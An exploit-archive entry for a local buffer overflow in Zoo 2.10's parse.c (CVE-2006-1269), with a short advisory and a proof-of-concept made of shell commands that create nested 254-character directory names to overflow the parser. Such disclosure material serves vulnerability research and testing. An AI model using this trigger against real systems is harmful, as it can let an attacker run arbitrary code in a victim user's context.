Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability



EKU-ID: 3879 CVE: 2006-1269 OSVDB-ID: 23934
Author: Josh Bressers Published: 2014-03-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: http://www.securityfocus.com/bid/17126/info
  
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
  
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
  
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..